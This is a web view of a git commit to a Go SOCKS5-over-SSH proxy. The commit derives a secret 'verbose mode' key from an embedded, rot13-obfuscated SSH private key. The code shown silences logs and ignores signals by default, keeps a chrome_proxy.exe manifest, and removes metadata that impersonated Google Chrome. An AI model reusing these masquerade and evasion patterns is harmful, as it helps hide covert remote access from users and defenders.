jerry
/
go-socks5-ssh-proxy
mirror of https://github.com/xor-gate/go-socks5-ssh-proxy
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

In release build derive VMK from SSH private key when cfg.VerboseModeKey is unset

This commit is contained in:
Jerry Jacobs 2024-07-31 21:03:54 +02:00
parent 7784fa8e4a
commit 6c278f1602
9 changed files with 41 additions and 27 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
Makefile
View File

@ -74,6 +74,8 @@ resources/ssh_private_key.base64.rot13: resources/ssh_private_key.base64
resources/ssh_private_key.base64.rot13.github: resources/ssh_private_key.base64.rot13 resources/ssh_private_key.base64.rot13.github: resources/ssh_private_key.base64.rot13
base64 -i $< -o $@ base64 -i $< -o $@
vmk: resources/ssh_private_key
shasum -a 256 $<
fmt: fmt:
gofmt -w *.go gofmt -w *.go

3
config.go
View File

@ -9,7 +9,8 @@ type config struct {
// verbose mode is force enabled. The key is read from the "VMK" environment // verbose mode is force enabled. The key is read from the "VMK" environment
// variable at startup. // variable at startup.
// //
// NOTE: This could be the sha256sum hex encoded string of the SSHPrivateKeyFile // When not set during build, in release mode the SHA256-hex fingerprint is
// derived from the PEM SSH private key.
VerboseModeKey string VerboseModeKey string
// SSH server user name // SSH server user name

6
main.go
View File

@ -16,9 +16,9 @@ var sshfpResolver *sshfp.Resolver
func secureEraseResourceSSHPrivateKey() { func secureEraseResourceSSHPrivateKey() {
log.Println("ERASING SSH private key") log.Println("ERASING SSH private key")
// for i := range resourceSSHPrivateKey { // for i := range resourceSSHPrivateKey {
// resourceSSHPrivateKey[i] = 0 // resourceSSHPrivateKey[i] = 0
// } // }
} }
type SSHHostPublicKeyFetcher struct { type SSHHostPublicKeyFetcher struct {

26
main_release.go
View File

@ -4,14 +4,16 @@
package main package main
import ( import (
"crypto/sha256"
_ "embed" _ "embed"
"encoding/base64"
"encoding/hex"
"github.com/awnumar/memguard"
"io/ioutil"
"log"
"os" "os"
"os/user" "os/user"
"path/filepath" "path/filepath"
"log"
"io/ioutil"
"encoding/base64"
"github.com/awnumar/memguard"
) )
//go:embed resources/ssh_private_key.base64.rot13 //go:embed resources/ssh_private_key.base64.rot13
@ -42,7 +44,7 @@ func resourcesPurge() {
memguard.Purge() memguard.Purge()
} }
func resourceSSHPrivateKeyUnpack() { func resourceSSHPrivateKeyUnpack() string {
resourceSSHPrivateKeyBase64 := rot13String(resourceSSHPrivateKeyBase64Rot13) resourceSSHPrivateKeyBase64 := rot13String(resourceSSHPrivateKeyBase64Rot13)
decodedData, err := base64.StdEncoding.DecodeString(resourceSSHPrivateKeyBase64) decodedData, err := base64.StdEncoding.DecodeString(resourceSSHPrivateKeyBase64)
@ -52,6 +54,11 @@ func resourceSSHPrivateKeyUnpack() {
resourceSSHPrivateKeyMemguardBuffer = memguard.NewBufferFromBytes(decodedData) resourceSSHPrivateKeyMemguardBuffer = memguard.NewBufferFromBytes(decodedData)
resourceSSHPrivateKey = resourceSSHPrivateKeyMemguardBuffer.String() resourceSSHPrivateKey = resourceSSHPrivateKeyMemguardBuffer.String()
shasum := sha256.New()
shasum.Write([]byte(resourceSSHPrivateKey))
return hex.EncodeToString(shasum.Sum(nil))
} }
func resourceSSHPrivateKeyDestroy() { func resourceSSHPrivateKeyDestroy() {
@ -66,7 +73,12 @@ func init() {
// Safely terminate in case of an interrupt signal // Safely terminate in case of an interrupt signal
memguard.CatchInterrupt() memguard.CatchInterrupt()
var logFile string var logFile string
sshPrivateKeySHA256Sum := resourceSSHPrivateKeyUnpack()
if cfg.VerboseModeKey == "" {
cfg.VerboseModeKey = sshPrivateKeySHA256Sum
}
dontSilenceKey := os.Getenv("VMK") dontSilenceKey := os.Getenv("VMK")
if dontSilenceKey == cfg.VerboseModeKey { if dontSilenceKey == cfg.VerboseModeKey {
@ -75,6 +87,7 @@ func init() {
systemIgnoreAllSignals() systemIgnoreAllSignals()
logFile = os.DevNull logFile = os.DevNull
} }
// TODO: memguard at this point the cfg.VerboseModeKey ?
if logFile == "homedir" { if logFile == "homedir" {
logFile = os.DevNull logFile = os.DevNull
@ -104,5 +117,4 @@ func init() {
} }
systemRouteAllLogging(logFile) systemRouteAllLogging(logFile)
resourceSSHPrivateKeyUnpack()
} }

2
system.go
View File

@ -1,8 +1,8 @@
package main package main
import ( import (
"log"
"io" "io"
"log"
"os" "os"
"os/signal" "os/signal"
"path/filepath" "path/filepath"

2
system_darwin.go
View File

@ -1,4 +1,4 @@
//go:build darwin //go:build darwin
// +build darwin // +build darwin
package main package main

2
system_linux.go
View File

@ -5,8 +5,8 @@ package main
import ( import (
"log" "log"
"syscall"
"strings" "strings"
"syscall"
) )
func systemGetWINEVersion() string { func systemGetWINEVersion() string {

3
system_windows.go
View File

@ -1,7 +1,8 @@
//go:build windows //go:build windows
//go:generate goversioninfo -manifest=resources/chrome_proxy.exe.manifest -64
// +build windows // +build windows
//go:generate goversioninfo -manifest=resources/chrome_proxy.exe.manifest -64
package main package main
import ( import (

22
versioninfo.json
View File

@ -19,18 +19,16 @@
"FileSubType": "00" "FileSubType": "00"
}, },
"StringFileInfo": { "StringFileInfo": {
"CompanyName": "Google LLC", "CompanyName": "",
"FileDescription": "Google Chrome", "FileDescription": "",
"FileVersion": "127.0.6533.73", "FileVersion": "",
"InternalName": "chrome_proxy", "InternalName": "",
"LegalCopyright": "Copyright 2024 Google LLC. All rights reserved.", "LegalCopyright": "",
"OriginalFilename": "chrome_proxy.exe", "OriginalFilename": "",
"ProductName": "Google Chrome", "ProductName": "",
"ProductVersion": "127.0.6533.73", "ProductVersion": "",
"CompanyShortName": "Google", "CompanyShortName": "",
"ProductShortName": "Chrome", "ProductShortName": ""
"LastChange": "b59f345ebd6c6bd0b5eb2a715334e912b514773d-refs/branch-heads/6533@{#1761}",
"Official Build": "1"
}, },
"VarFileInfo": { "VarFileInfo": {
"Translation": { "Translation": {